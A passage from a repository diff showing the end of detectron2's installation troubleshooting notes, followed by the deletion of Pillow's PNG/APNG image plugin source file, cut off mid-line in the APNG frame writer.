    - - -
    - -C++ compilation errors from NVCC / NVRTC, or "Unsupported gpu architecture" - -
    -A few possibilities: - -1. Local CUDA/NVCC version has to match the CUDA version of your PyTorch. Both can be found in `python collect_env.py` - (download from [here](./detectron2/utils/collect_env.py)). - When they are inconsistent, you need to either install a different build of PyTorch (or build by yourself) - to match your local CUDA installation, or install a different version of CUDA to match PyTorch. - -2. Local CUDA/NVCC version shall support the SM architecture (a.k.a. compute capability) of your GPU. - The capability of your GPU can be found at [developer.nvidia.com/cuda-gpus](https://developer.nvidia.com/cuda-gpus). - The capability supported by NVCC is listed at [here](https://gist.github.com/ax3l/9489132). - If your NVCC version is too old, this can be workaround by setting environment variable - `TORCH_CUDA_ARCH_LIST` to a lower, supported capability. - -3. The combination of NVCC and GCC you use is incompatible. You need to change one of their versions. - See [here](https://gist.github.com/ax3l/9489132) for some valid combinations. - Notably, CUDA<=10.1.105 doesn't support GCC>7.3. - - The CUDA/GCC version used by PyTorch can be found by `print(torch.__config__.show())`. - -
    - - -
    - -"ImportError: cannot import name '_C'". - -
    -Please build and install detectron2 following the instructions above. - -Or, if you are running code from detectron2's root directory, `cd` to a different one. -Otherwise you may not import the code that you installed. -
    - - -
    - -Any issue on windows. - -
    - -Detectron2 is continuously built on windows with [CircleCI](https://app.circleci.com/pipelines/github/facebookresearch/detectron2?branch=main). -However we do not provide official support for it. -PRs that improves code compatibility on windows are welcome. -
    - -
    - -ONNX conversion segfault after some "TraceWarning". - -
    -The ONNX package is compiled with a too old compiler. - -Please build and install ONNX from its source code using a compiler -whose version is closer to what's used by PyTorch (available in `torch.__config__.show()`). -
    - - -
    - -"library not found for -lstdc++" on older version of MacOS - -
    - -See [this stackoverflow answer](https://stackoverflow.com/questions/56083725/macos-build-issues-lstdc-not-found-while-building-python-package). - -
    - - -### Installation inside specific environments: - -* __Colab__: see our [Colab Tutorial](https://colab.research.google.com/drive/16jcaJoc6bCFAQ96jDe2HwtXj7BMD_-m5) - which has step-by-step instructions. - -* __Docker__: The official [Dockerfile](docker) installs detectron2 with a few simple commands. diff --git a/spaces/camilosegura/traductor-multilenguaje/Lib/site-packages/PIL/PngImagePlugin.py b/spaces/camilosegura/traductor-multilenguaje/Lib/site-packages/PIL/PngImagePlugin.py deleted file mode 100644 index bfa8cb7ac66c15e2f5d1128f4ba9a1ad69758ec1..0000000000000000000000000000000000000000 --- a/spaces/camilosegura/traductor-multilenguaje/Lib/site-packages/PIL/PngImagePlugin.py +++ /dev/null @@ -1,1456 +0,0 @@ -# -# The Python Imaging Library. -# $Id$ -# -# PNG support code -# -# See "PNG (Portable Network Graphics) Specification, version 1.0; -# W3C Recommendation", 1996-10-01, Thomas Boutell (ed.). -# -# history: -# 1996-05-06 fl Created (couldn't resist it) -# 1996-12-14 fl Upgraded, added read and verify support (0.2) -# 1996-12-15 fl Separate PNG stream parser -# 1996-12-29 fl Added write support, added getchunks -# 1996-12-30 fl Eliminated circular references in decoder (0.3) -# 1998-07-12 fl Read/write 16-bit images as mode I (0.4) -# 2001-02-08 fl Added transparency support (from Zircon) (0.5) -# 2001-04-16 fl Don't close data source in "open" method (0.6) -# 2004-02-24 fl Don't even pretend to support interlaced files (0.7) -# 2004-08-31 fl Do basic sanity check on chunk identifiers (0.8) -# 2004-09-20 fl Added PngInfo chunk container -# 2004-12-18 fl Added DPI read support (based on code by Niki Spahiev) -# 2008-08-13 fl Added tRNS support for RGB images -# 2009-03-06 fl Support for preserving ICC profiles (by Florian Hoech) -# 2009-03-08 fl Added zTXT support (from Lowell Alleman) -# 2009-03-29 fl Read interlaced PNG files (from Conrado Porto Lopes Gouvua) -# -# Copyright (c) 1997-2009 by Secret Labs AB -# Copyright (c) 1996 by Fredrik Lundh -# -# See the README file for information on usage and redistribution. -# - -import itertools -import logging -import re -import struct -import warnings -import zlib -from enum import IntEnum - -from . import Image, ImageChops, ImageFile, ImagePalette, ImageSequence -from ._binary import i16be as i16 -from ._binary import i32be as i32 -from ._binary import o8 -from ._binary import o16be as o16 -from ._binary import o32be as o32 - -logger = logging.getLogger(__name__) - -is_cid = re.compile(rb"\w\w\w\w").match - - -_MAGIC = b"\211PNG\r\n\032\n" - - -_MODES = { - # supported bits/color combinations, and corresponding modes/rawmodes - # Greyscale - (1, 0): ("1", "1"), - (2, 0): ("L", "L;2"), - (4, 0): ("L", "L;4"), - (8, 0): ("L", "L"), - (16, 0): ("I", "I;16B"), - # Truecolour - (8, 2): ("RGB", "RGB"), - (16, 2): ("RGB", "RGB;16B"), - # Indexed-colour - (1, 3): ("P", "P;1"), - (2, 3): ("P", "P;2"), - (4, 3): ("P", "P;4"), - (8, 3): ("P", "P"), - # Greyscale with alpha - (8, 4): ("LA", "LA"), - (16, 4): ("RGBA", "LA;16B"), # LA;16B->LA not yet available - # Truecolour with alpha - (8, 6): ("RGBA", "RGBA"), - (16, 6): ("RGBA", "RGBA;16B"), -} - - -_simple_palette = re.compile(b"^\xff*\x00\xff*$") - -MAX_TEXT_CHUNK = ImageFile.SAFEBLOCK -""" -Maximum decompressed size for a iTXt or zTXt chunk. -Eliminates decompression bombs where compressed chunks can expand 1000x. -See :ref:`Text in PNG File Format`. -""" -MAX_TEXT_MEMORY = 64 * MAX_TEXT_CHUNK -""" -Set the maximum total text chunk size. -See :ref:`Text in PNG File Format`. -""" - - -# APNG frame disposal modes -class Disposal(IntEnum): - OP_NONE = 0 - """ - No disposal is done on this frame before rendering the next frame. - See :ref:`Saving APNG sequences`. - """ - OP_BACKGROUND = 1 - """ - This frame’s modified region is cleared to fully transparent black before rendering - the next frame. - See :ref:`Saving APNG sequences`. - """ - OP_PREVIOUS = 2 - """ - This frame’s modified region is reverted to the previous frame’s contents before - rendering the next frame. - See :ref:`Saving APNG sequences`. - """ - - -# APNG frame blend modes -class Blend(IntEnum): - OP_SOURCE = 0 - """ - All color components of this frame, including alpha, overwrite the previous output - image contents. - See :ref:`Saving APNG sequences`. - """ - OP_OVER = 1 - """ - This frame should be alpha composited with the previous output image contents. - See :ref:`Saving APNG sequences`. - """ - - -def _safe_zlib_decompress(s): - dobj = zlib.decompressobj() - plaintext = dobj.decompress(s, MAX_TEXT_CHUNK) - if dobj.unconsumed_tail: - msg = "Decompressed Data Too Large" - raise ValueError(msg) - return plaintext - - -def _crc32(data, seed=0): - return zlib.crc32(data, seed) & 0xFFFFFFFF - - -# -------------------------------------------------------------------- -# Support classes. Suitable for PNG and related formats like MNG etc. - - -class ChunkStream: - def __init__(self, fp): - self.fp = fp - self.queue = [] - - def read(self): - """Fetch a new chunk. Returns header information.""" - cid = None - - if self.queue: - cid, pos, length = self.queue.pop() - self.fp.seek(pos) - else: - s = self.fp.read(8) - cid = s[4:] - pos = self.fp.tell() - length = i32(s) - - if not is_cid(cid): - if not ImageFile.LOAD_TRUNCATED_IMAGES: - msg = f"broken PNG file (chunk {repr(cid)})" - raise SyntaxError(msg) - - return cid, pos, length - - def __enter__(self): - return self - - def __exit__(self, *args): - self.close() - - def close(self): - self.queue = self.fp = None - - def push(self, cid, pos, length): - self.queue.append((cid, pos, length)) - - def call(self, cid, pos, length): - """Call the appropriate chunk handler""" - - logger.debug("STREAM %r %s %s", cid, pos, length) - return getattr(self, "chunk_" + cid.decode("ascii"))(pos, length) - - def crc(self, cid, data): - """Read and verify checksum""" - - # Skip CRC checks for ancillary chunks if allowed to load truncated - # images - # 5th byte of first char is 1 [specs, section 5.4] - if ImageFile.LOAD_TRUNCATED_IMAGES and (cid[0] >> 5 & 1): - self.crc_skip(cid, data) - return - - try: - crc1 = _crc32(data, _crc32(cid)) - crc2 = i32(self.fp.read(4)) - if crc1 != crc2: - msg = f"broken PNG file (bad header checksum in {repr(cid)})" - raise SyntaxError(msg) - except struct.error as e: - msg = f"broken PNG file (incomplete checksum in {repr(cid)})" - raise SyntaxError(msg) from e - - def crc_skip(self, cid, data): - """Read checksum""" - - self.fp.read(4) - - def verify(self, endchunk=b"IEND"): - # Simple approach; just calculate checksum for all remaining - # blocks. Must be called directly after open. - - cids = [] - - while True: - try: - cid, pos, length = self.read() - except struct.error as e: - msg = "truncated PNG file" - raise OSError(msg) from e - - if cid == endchunk: - break - self.crc(cid, ImageFile._safe_read(self.fp, length)) - cids.append(cid) - - return cids - - -class iTXt(str): - """ - Subclass of string to allow iTXt chunks to look like strings while - keeping their extra information - - """ - - @staticmethod - def __new__(cls, text, lang=None, tkey=None): - """ - :param cls: the class to use when creating the instance - :param text: value for this key - :param lang: language code - :param tkey: UTF-8 version of the key name - """ - - self = str.__new__(cls, text) - self.lang = lang - self.tkey = tkey - return self - - -class PngInfo: - """ - PNG chunk container (for use with save(pnginfo=)) - - """ - - def __init__(self): - self.chunks = [] - - def add(self, cid, data, after_idat=False): - """Appends an arbitrary chunk. Use with caution. - - :param cid: a byte string, 4 bytes long. - :param data: a byte string of the encoded data - :param after_idat: for use with private chunks. Whether the chunk - should be written after IDAT - - """ - - chunk = [cid, data] - if after_idat: - chunk.append(True) - self.chunks.append(tuple(chunk)) - - def add_itxt(self, key, value, lang="", tkey="", zip=False): - """Appends an iTXt chunk. - - :param key: latin-1 encodable text key name - :param value: value for this key - :param lang: language code - :param tkey: UTF-8 version of the key name - :param zip: compression flag - - """ - - if not isinstance(key, bytes): - key = key.encode("latin-1", "strict") - if not isinstance(value, bytes): - value = value.encode("utf-8", "strict") - if not isinstance(lang, bytes): - lang = lang.encode("utf-8", "strict") - if not isinstance(tkey, bytes): - tkey = tkey.encode("utf-8", "strict") - - if zip: - self.add( - b"iTXt", - key + b"\0\x01\0" + lang + b"\0" + tkey + b"\0" + zlib.compress(value), - ) - else: - self.add(b"iTXt", key + b"\0\0\0" + lang + b"\0" + tkey + b"\0" + value) - - def add_text(self, key, value, zip=False): - """Appends a text chunk. - - :param key: latin-1 encodable text key name - :param value: value for this key, text or an - :py:class:`PIL.PngImagePlugin.iTXt` instance - :param zip: compression flag - - """ - if isinstance(value, iTXt): - return self.add_itxt(key, value, value.lang, value.tkey, zip=zip) - - # The tEXt chunk stores latin-1 text - if not isinstance(value, bytes): - try: - value = value.encode("latin-1", "strict") - except UnicodeError: - return self.add_itxt(key, value, zip=zip) - - if not isinstance(key, bytes): - key = key.encode("latin-1", "strict") - - if zip: - self.add(b"zTXt", key + b"\0\0" + zlib.compress(value)) - else: - self.add(b"tEXt", key + b"\0" + value) - - -# -------------------------------------------------------------------- -# PNG image stream (IHDR/IEND) - - -class PngStream(ChunkStream): - def __init__(self, fp): - super().__init__(fp) - - # local copies of Image attributes - self.im_info = {} - self.im_text = {} - self.im_size = (0, 0) - self.im_mode = None - self.im_tile = None - self.im_palette = None - self.im_custom_mimetype = None - self.im_n_frames = None - self._seq_num = None - self.rewind_state = None - - self.text_memory = 0 - - def check_text_memory(self, chunklen): - self.text_memory += chunklen - if self.text_memory > MAX_TEXT_MEMORY: - msg = ( - "Too much memory used in text chunks: " - f"{self.text_memory}>MAX_TEXT_MEMORY" - ) - raise ValueError(msg) - - def save_rewind(self): - self.rewind_state = { - "info": self.im_info.copy(), - "tile": self.im_tile, - "seq_num": self._seq_num, - } - - def rewind(self): - self.im_info = self.rewind_state["info"] - self.im_tile = self.rewind_state["tile"] - self._seq_num = self.rewind_state["seq_num"] - - def chunk_iCCP(self, pos, length): - # ICC profile - s = ImageFile._safe_read(self.fp, length) - # according to PNG spec, the iCCP chunk contains: - # Profile name 1-79 bytes (character string) - # Null separator 1 byte (null character) - # Compression method 1 byte (0) - # Compressed profile n bytes (zlib with deflate compression) - i = s.find(b"\0") - logger.debug("iCCP profile name %r", s[:i]) - logger.debug("Compression method %s", s[i]) - comp_method = s[i] - if comp_method != 0: - msg = f"Unknown compression method {comp_method} in iCCP chunk" - raise SyntaxError(msg) - try: - icc_profile = _safe_zlib_decompress(s[i + 2 :]) - except ValueError: - if ImageFile.LOAD_TRUNCATED_IMAGES: - icc_profile = None - else: - raise - except zlib.error: - icc_profile = None # FIXME - self.im_info["icc_profile"] = icc_profile - return s - - def chunk_IHDR(self, pos, length): - # image header - s = ImageFile._safe_read(self.fp, length) - if length < 13: - if ImageFile.LOAD_TRUNCATED_IMAGES: - return s - msg = "Truncated IHDR chunk" - raise ValueError(msg) - self.im_size = i32(s, 0), i32(s, 4) - try: - self.im_mode, self.im_rawmode = _MODES[(s[8], s[9])] - except Exception: - pass - if s[12]: - self.im_info["interlace"] = 1 - if s[11]: - msg = "unknown filter category" - raise SyntaxError(msg) - return s - - def chunk_IDAT(self, pos, length): - # image data - if "bbox" in self.im_info: - tile = [("zip", self.im_info["bbox"], pos, self.im_rawmode)] - else: - if self.im_n_frames is not None: - self.im_info["default_image"] = True - tile = [("zip", (0, 0) + self.im_size, pos, self.im_rawmode)] - self.im_tile = tile - self.im_idat = length - raise EOFError - - def chunk_IEND(self, pos, length): - # end of PNG image - raise EOFError - - def chunk_PLTE(self, pos, length): - # palette - s = ImageFile._safe_read(self.fp, length) - if self.im_mode == "P": - self.im_palette = "RGB", s - return s - - def chunk_tRNS(self, pos, length): - # transparency - s = ImageFile._safe_read(self.fp, length) - if self.im_mode == "P": - if _simple_palette.match(s): - # tRNS contains only one full-transparent entry, - # other entries are full opaque - i = s.find(b"\0") - if i >= 0: - self.im_info["transparency"] = i - else: - # otherwise, we have a byte string with one alpha value - # for each palette entry - self.im_info["transparency"] = s - elif self.im_mode in ("1", "L", "I"): - self.im_info["transparency"] = i16(s) - elif self.im_mode == "RGB": - self.im_info["transparency"] = i16(s), i16(s, 2), i16(s, 4) - return s - - def chunk_gAMA(self, pos, length): - # gamma setting - s = ImageFile._safe_read(self.fp, length) - self.im_info["gamma"] = i32(s) / 100000.0 - return s - - def chunk_cHRM(self, pos, length): - # chromaticity, 8 unsigned ints, actual value is scaled by 100,000 - # WP x,y, Red x,y, Green x,y Blue x,y - - s = ImageFile._safe_read(self.fp, length) - raw_vals = struct.unpack(">%dI" % (len(s) // 4), s) - self.im_info["chromaticity"] = tuple(elt / 100000.0 for elt in raw_vals) - return s - - def chunk_sRGB(self, pos, length): - # srgb rendering intent, 1 byte - # 0 perceptual - # 1 relative colorimetric - # 2 saturation - # 3 absolute colorimetric - - s = ImageFile._safe_read(self.fp, length) - if length < 1: - if ImageFile.LOAD_TRUNCATED_IMAGES: - return s - msg = "Truncated sRGB chunk" - raise ValueError(msg) - self.im_info["srgb"] = s[0] - return s - - def chunk_pHYs(self, pos, length): - # pixels per unit - s = ImageFile._safe_read(self.fp, length) - if length < 9: - if ImageFile.LOAD_TRUNCATED_IMAGES: - return s - msg = "Truncated pHYs chunk" - raise ValueError(msg) - px, py = i32(s, 0), i32(s, 4) - unit = s[8] - if unit == 1: # meter - dpi = px * 0.0254, py * 0.0254 - self.im_info["dpi"] = dpi - elif unit == 0: - self.im_info["aspect"] = px, py - return s - - def chunk_tEXt(self, pos, length): - # text - s = ImageFile._safe_read(self.fp, length) - try: - k, v = s.split(b"\0", 1) - except ValueError: - # fallback for broken tEXt tags - k = s - v = b"" - if k: - k = k.decode("latin-1", "strict") - v_str = v.decode("latin-1", "replace") - - self.im_info[k] = v if k == "exif" else v_str - self.im_text[k] = v_str - self.check_text_memory(len(v_str)) - - return s - - def chunk_zTXt(self, pos, length): - # compressed text - s = ImageFile._safe_read(self.fp, length) - try: - k, v = s.split(b"\0", 1) - except ValueError: - k = s - v = b"" - if v: - comp_method = v[0] - else: - comp_method = 0 - if comp_method != 0: - msg = f"Unknown compression method {comp_method} in zTXt chunk" - raise SyntaxError(msg) - try: - v = _safe_zlib_decompress(v[1:]) - except ValueError: - if ImageFile.LOAD_TRUNCATED_IMAGES: - v = b"" - else: - raise - except zlib.error: - v = b"" - - if k: - k = k.decode("latin-1", "strict") - v = v.decode("latin-1", "replace") - - self.im_info[k] = self.im_text[k] = v - self.check_text_memory(len(v)) - - return s - - def chunk_iTXt(self, pos, length): - # international text - r = s = ImageFile._safe_read(self.fp, length) - try: - k, r = r.split(b"\0", 1) - except ValueError: - return s - if len(r) < 2: - return s - cf, cm, r = r[0], r[1], r[2:] - try: - lang, tk, v = r.split(b"\0", 2) - except ValueError: - return s - if cf != 0: - if cm == 0: - try: - v = _safe_zlib_decompress(v) - except ValueError: - if ImageFile.LOAD_TRUNCATED_IMAGES: - return s - else: - raise - except zlib.error: - return s - else: - return s - try: - k = k.decode("latin-1", "strict") - lang = lang.decode("utf-8", "strict") - tk = tk.decode("utf-8", "strict") - v = v.decode("utf-8", "strict") - except UnicodeError: - return s - - self.im_info[k] = self.im_text[k] = iTXt(v, lang, tk) - self.check_text_memory(len(v)) - - return s - - def chunk_eXIf(self, pos, length): - s = ImageFile._safe_read(self.fp, length) - self.im_info["exif"] = b"Exif\x00\x00" + s - return s - - # APNG chunks - def chunk_acTL(self, pos, length): - s = ImageFile._safe_read(self.fp, length) - if length < 8: - if ImageFile.LOAD_TRUNCATED_IMAGES: - return s - msg = "APNG contains truncated acTL chunk" - raise ValueError(msg) - if self.im_n_frames is not None: - self.im_n_frames = None - warnings.warn("Invalid APNG, will use default PNG image if possible") - return s - n_frames = i32(s) - if n_frames == 0 or n_frames > 0x80000000: - warnings.warn("Invalid APNG, will use default PNG image if possible") - return s - self.im_n_frames = n_frames - self.im_info["loop"] = i32(s, 4) - self.im_custom_mimetype = "image/apng" - return s - - def chunk_fcTL(self, pos, length): - s = ImageFile._safe_read(self.fp, length) - if length < 26: - if ImageFile.LOAD_TRUNCATED_IMAGES: - return s - msg = "APNG contains truncated fcTL chunk" - raise ValueError(msg) - seq = i32(s) - if (self._seq_num is None and seq != 0) or ( - self._seq_num is not None and self._seq_num != seq - 1 - ): - msg = "APNG contains frame sequence errors" - raise SyntaxError(msg) - self._seq_num = seq - width, height = i32(s, 4), i32(s, 8) - px, py = i32(s, 12), i32(s, 16) - im_w, im_h = self.im_size - if px + width > im_w or py + height > im_h: - msg = "APNG contains invalid frames" - raise SyntaxError(msg) - self.im_info["bbox"] = (px, py, px + width, py + height) - delay_num, delay_den = i16(s, 20), i16(s, 22) - if delay_den == 0: - delay_den = 100 - self.im_info["duration"] = float(delay_num) / float(delay_den) * 1000 - self.im_info["disposal"] = s[24] - self.im_info["blend"] = s[25] - return s - - def chunk_fdAT(self, pos, length): - if length < 4: - if ImageFile.LOAD_TRUNCATED_IMAGES: - s = ImageFile._safe_read(self.fp, length) - return s - msg = "APNG contains truncated fDAT chunk" - raise ValueError(msg) - s = ImageFile._safe_read(self.fp, 4) - seq = i32(s) - if self._seq_num != seq - 1: - msg = "APNG contains frame sequence errors" - raise SyntaxError(msg) - self._seq_num = seq - return self.chunk_IDAT(pos + 4, length - 4) - - -# -------------------------------------------------------------------- -# PNG reader - - -def _accept(prefix): - return prefix[:8] == _MAGIC - - -## -# Image plugin for PNG images. - - -class PngImageFile(ImageFile.ImageFile): - format = "PNG" - format_description = "Portable network graphics" - - def _open(self): - if not _accept(self.fp.read(8)): - msg = "not a PNG file" - raise SyntaxError(msg) - self._fp = self.fp - self.__frame = 0 - - # - # Parse headers up to the first IDAT or fDAT chunk - - self.private_chunks = [] - self.png = PngStream(self.fp) - - while True: - # - # get next chunk - - cid, pos, length = self.png.read() - - try: - s = self.png.call(cid, pos, length) - except EOFError: - break - except AttributeError: - logger.debug("%r %s %s (unknown)", cid, pos, length) - s = ImageFile._safe_read(self.fp, length) - if cid[1:2].islower(): - self.private_chunks.append((cid, s)) - - self.png.crc(cid, s) - - # - # Copy relevant attributes from the PngStream. An alternative - # would be to let the PngStream class modify these attributes - # directly, but that introduces circular references which are - # difficult to break if things go wrong in the decoder... - # (believe me, I've tried ;-) - - self.mode = self.png.im_mode - self._size = self.png.im_size - self.info = self.png.im_info - self._text = None - self.tile = self.png.im_tile - self.custom_mimetype = self.png.im_custom_mimetype - self.n_frames = self.png.im_n_frames or 1 - self.default_image = self.info.get("default_image", False) - - if self.png.im_palette: - rawmode, data = self.png.im_palette - self.palette = ImagePalette.raw(rawmode, data) - - if cid == b"fdAT": - self.__prepare_idat = length - 4 - else: - self.__prepare_idat = length # used by load_prepare() - - if self.png.im_n_frames is not None: - self._close_exclusive_fp_after_loading = False - self.png.save_rewind() - self.__rewind_idat = self.__prepare_idat - self.__rewind = self._fp.tell() - if self.default_image: - # IDAT chunk contains default image and not first animation frame - self.n_frames += 1 - self._seek(0) - self.is_animated = self.n_frames > 1 - - @property - def text(self): - # experimental - if self._text is None: - # iTxt, tEXt and zTXt chunks may appear at the end of the file - # So load the file to ensure that they are read - if self.is_animated: - frame = self.__frame - # for APNG, seek to the final frame before loading - self.seek(self.n_frames - 1) - self.load() - if self.is_animated: - self.seek(frame) - return self._text - - def verify(self): - """Verify PNG file""" - - if self.fp is None: - msg = "verify must be called directly after open" - raise RuntimeError(msg) - - # back up to beginning of IDAT block - self.fp.seek(self.tile[0][2] - 8) - - self.png.verify() - self.png.close() - - if self._exclusive_fp: - self.fp.close() - self.fp = None - - def seek(self, frame): - if not self._seek_check(frame): - return - if frame < self.__frame: - self._seek(0, True) - - last_frame = self.__frame - for f in range(self.__frame + 1, frame + 1): - try: - self._seek(f) - except EOFError as e: - self.seek(last_frame) - msg = "no more images in APNG file" - raise EOFError(msg) from e - - def _seek(self, frame, rewind=False): - if frame == 0: - if rewind: - self._fp.seek(self.__rewind) - self.png.rewind() - self.__prepare_idat = self.__rewind_idat - self.im = None - if self.pyaccess: - self.pyaccess = None - self.info = self.png.im_info - self.tile = self.png.im_tile - self.fp = self._fp - self._prev_im = None - self.dispose = None - self.default_image = self.info.get("default_image", False) - self.dispose_op = self.info.get("disposal") - self.blend_op = self.info.get("blend") - self.dispose_extent = self.info.get("bbox") - self.__frame = 0 - else: - if frame != self.__frame + 1: - msg = f"cannot seek to frame {frame}" - raise ValueError(msg) - - # ensure previous frame was loaded - self.load() - - if self.dispose: - self.im.paste(self.dispose, self.dispose_extent) - self._prev_im = self.im.copy() - - self.fp = self._fp - - # advance to the next frame - if self.__prepare_idat: - ImageFile._safe_read(self.fp, self.__prepare_idat) - self.__prepare_idat = 0 - frame_start = False - while True: - self.fp.read(4) # CRC - - try: - cid, pos, length = self.png.read() - except (struct.error, SyntaxError): - break - - if cid == b"IEND": - msg = "No more images in APNG file" - raise EOFError(msg) - if cid == b"fcTL": - if frame_start: - # there must be at least one fdAT chunk between fcTL chunks - msg = "APNG missing frame data" - raise SyntaxError(msg) - frame_start = True - - try: - self.png.call(cid, pos, length) - except UnicodeDecodeError: - break - except EOFError: - if cid == b"fdAT": - length -= 4 - if frame_start: - self.__prepare_idat = length - break - ImageFile._safe_read(self.fp, length) - except AttributeError: - logger.debug("%r %s %s (unknown)", cid, pos, length) - ImageFile._safe_read(self.fp, length) - - self.__frame = frame - self.tile = self.png.im_tile - self.dispose_op = self.info.get("disposal") - self.blend_op = self.info.get("blend") - self.dispose_extent = self.info.get("bbox") - - if not self.tile: - raise EOFError - - # setup frame disposal (actual disposal done when needed in the next _seek()) - if self._prev_im is None and self.dispose_op == Disposal.OP_PREVIOUS: - self.dispose_op = Disposal.OP_BACKGROUND - - if self.dispose_op == Disposal.OP_PREVIOUS: - self.dispose = self._prev_im.copy() - self.dispose = self._crop(self.dispose, self.dispose_extent) - elif self.dispose_op == Disposal.OP_BACKGROUND: - self.dispose = Image.core.fill(self.mode, self.size) - self.dispose = self._crop(self.dispose, self.dispose_extent) - else: - self.dispose = None - - def tell(self): - return self.__frame - - def load_prepare(self): - """internal: prepare to read PNG file""" - - if self.info.get("interlace"): - self.decoderconfig = self.decoderconfig + (1,) - - self.__idat = self.__prepare_idat # used by load_read() - ImageFile.ImageFile.load_prepare(self) - - def load_read(self, read_bytes): - """internal: read more image data""" - - while self.__idat == 0: - # end of chunk, skip forward to next one - - self.fp.read(4) # CRC - - cid, pos, length = self.png.read() - - if cid not in [b"IDAT", b"DDAT", b"fdAT"]: - self.png.push(cid, pos, length) - return b"" - - if cid == b"fdAT": - try: - self.png.call(cid, pos, length) - except EOFError: - pass - self.__idat = length - 4 # sequence_num has already been read - else: - self.__idat = length # empty chunks are allowed - - # read more data from this chunk - if read_bytes <= 0: - read_bytes = self.__idat - else: - read_bytes = min(read_bytes, self.__idat) - - self.__idat = self.__idat - read_bytes - - return self.fp.read(read_bytes) - - def load_end(self): - """internal: finished reading image data""" - if self.__idat != 0: - self.fp.read(self.__idat) - while True: - self.fp.read(4) # CRC - - try: - cid, pos, length = self.png.read() - except (struct.error, SyntaxError): - break - - if cid == b"IEND": - break - elif cid == b"fcTL" and self.is_animated: - # start of the next frame, stop reading - self.__prepare_idat = 0 - self.png.push(cid, pos, length) - break - - try: - self.png.call(cid, pos, length) - except UnicodeDecodeError: - break - except EOFError: - if cid == b"fdAT": - length -= 4 - ImageFile._safe_read(self.fp, length) - except AttributeError: - logger.debug("%r %s %s (unknown)", cid, pos, length) - s = ImageFile._safe_read(self.fp, length) - if cid[1:2].islower(): - self.private_chunks.append((cid, s, True)) - self._text = self.png.im_text - if not self.is_animated: - self.png.close() - self.png = None - else: - if self._prev_im and self.blend_op == Blend.OP_OVER: - updated = self._crop(self.im, self.dispose_extent) - if self.im.mode == "RGB" and "transparency" in self.info: - mask = updated.convert_transparent( - "RGBA", self.info["transparency"] - ) - else: - mask = updated.convert("RGBA") - self._prev_im.paste(updated, self.dispose_extent, mask) - self.im = self._prev_im - if self.pyaccess: - self.pyaccess = None - - def _getexif(self): - if "exif" not in self.info: - self.load() - if "exif" not in self.info and "Raw profile type exif" not in self.info: - return None - return self.getexif()._get_merged_dict() - - def getexif(self): - if "exif" not in self.info: - self.load() - - return super().getexif() - - def getxmp(self): - """ - Returns a dictionary containing the XMP tags. - Requires defusedxml to be installed. - - :returns: XMP tags in a dictionary. - """ - return ( - self._getxmp(self.info["XML:com.adobe.xmp"]) - if "XML:com.adobe.xmp" in self.info - else {} - ) - - -# -------------------------------------------------------------------- -# PNG writer - -_OUTMODES = { - # supported PIL modes, and corresponding rawmodes/bits/color combinations - "1": ("1", b"\x01\x00"), - "L;1": ("L;1", b"\x01\x00"), - "L;2": ("L;2", b"\x02\x00"), - "L;4": ("L;4", b"\x04\x00"), - "L": ("L", b"\x08\x00"), - "LA": ("LA", b"\x08\x04"), - "I": ("I;16B", b"\x10\x00"), - "I;16": ("I;16B", b"\x10\x00"), - "P;1": ("P;1", b"\x01\x03"), - "P;2": ("P;2", b"\x02\x03"), - "P;4": ("P;4", b"\x04\x03"), - "P": ("P", b"\x08\x03"), - "RGB": ("RGB", b"\x08\x02"), - "RGBA": ("RGBA", b"\x08\x06"), -} - - -def putchunk(fp, cid, *data): - """Write a PNG chunk (including CRC field)""" - - data = b"".join(data) - - fp.write(o32(len(data)) + cid) - fp.write(data) - crc = _crc32(data, _crc32(cid)) - fp.write(o32(crc)) - - -class _idat: - # wrap output from the encoder in IDAT chunks - - def __init__(self, fp, chunk): - self.fp = fp - self.chunk = chunk - - def write(self, data): - self.chunk(self.fp, b"IDAT", data) - - -class _fdat: - # wrap encoder output in fdAT chunks - - def __init__(self, fp, chunk, seq_num): - self.fp = fp - self.chunk = chunk - self.seq_num = seq_num - - def write(self, data): - self.chunk(self.fp, b"fdAT", o32(self.seq_num), data) - self.seq_num += 1 - - -def _write_multiple_frames(im, fp, chunk, rawmode, default_image, append_images): - duration = im.encoderinfo.get("duration", im.info.get("duration", 0)) - loop = im.encoderinfo.get("loop", im.info.get("loop", 0)) - disposal = im.encoderinfo.get("disposal", im.info.get("disposal", Disposal.OP_NONE)) - blend = im.encoderinfo.get("blend", im.info.get("blend", Blend.OP_SOURCE)) - - if default_image: - chain = itertools.chain(append_images) - else: - chain = itertools.chain([im], append_images) - - im_frames = [] - frame_count = 0 - for im_seq in chain: - for im_frame in ImageSequence.Iterator(im_seq): - if im_frame.mode == rawmode: - im_frame = im_frame.copy() - else: - if rawmode == "P": - im_frame = im_frame.convert(rawmode, palette=im.palette) - else: - im_frame = im_frame.convert(rawmode) - encoderinfo = im.encoderinfo.copy() - if isinstance(duration, (list, tuple)): - encoderinfo["duration"] = duration[frame_count] - if isinstance(disposal, (list, tuple)): - encoderinfo["disposal"] = disposal[frame_count] - if isinstance(blend, (list, tuple)): - encoderinfo["blend"] = blend[frame_count] - frame_count += 1 - - if im_frames: - previous = im_frames[-1] - prev_disposal = previous["encoderinfo"].get("disposal") - prev_blend = previous["encoderinfo"].get("blend") - if prev_disposal == Disposal.OP_PREVIOUS and len(im_frames) < 2: - prev_disposal = Disposal.OP_BACKGROUND - - if prev_disposal == Disposal.OP_BACKGROUND: - base_im = previous["im"].copy() - dispose = Image.core.fill("RGBA", im.size, (0, 0, 0, 0)) - bbox = previous["bbox"] - if bbox: - dispose = dispose.crop(bbox) - else: - bbox = (0, 0) + im.size - base_im.paste(dispose, bbox) - elif prev_disposal == Disposal.OP_PREVIOUS: - base_im = im_frames[-2]["im"] - else: - base_im = previous["im"] - delta = ImageChops.subtract_modulo( - im_frame.convert("RGBA"), base_im.convert("RGBA") - ) - bbox = delta.getbbox(alpha_only=False) - if ( - not bbox - and prev_disposal == encoderinfo.get("disposal") - and prev_blend == encoderinfo.get("blend") - ): - previous["encoderinfo"]["duration"] += encoderinfo.get( - "duration", duration - ) - continue - else: - bbox = None - if "duration" not in encoderinfo: - encoderinfo["duration"] = duration - im_frames.append({"im": im_frame, "bbox": bbox, "encoderinfo": encoderinfo}) - - # animation control - chunk( - fp, - b"acTL", - o32(len(im_frames)), # 0: num_frames - o32(loop), # 4: num_plays - ) - - # default image IDAT (if it exists) - if default_image: - ImageFile._save(im, _idat(fp, chunk), [("zip", (0, 0) + im.size, 0, rawmode)]) - - seq_num = 0 - for frame, frame_data in enumerate(im_frames): - im_frame = frame_data["im"] - if not frame_data["bbox"]: - bbox = (0, 0) + im_frame.size - else: - bbox = 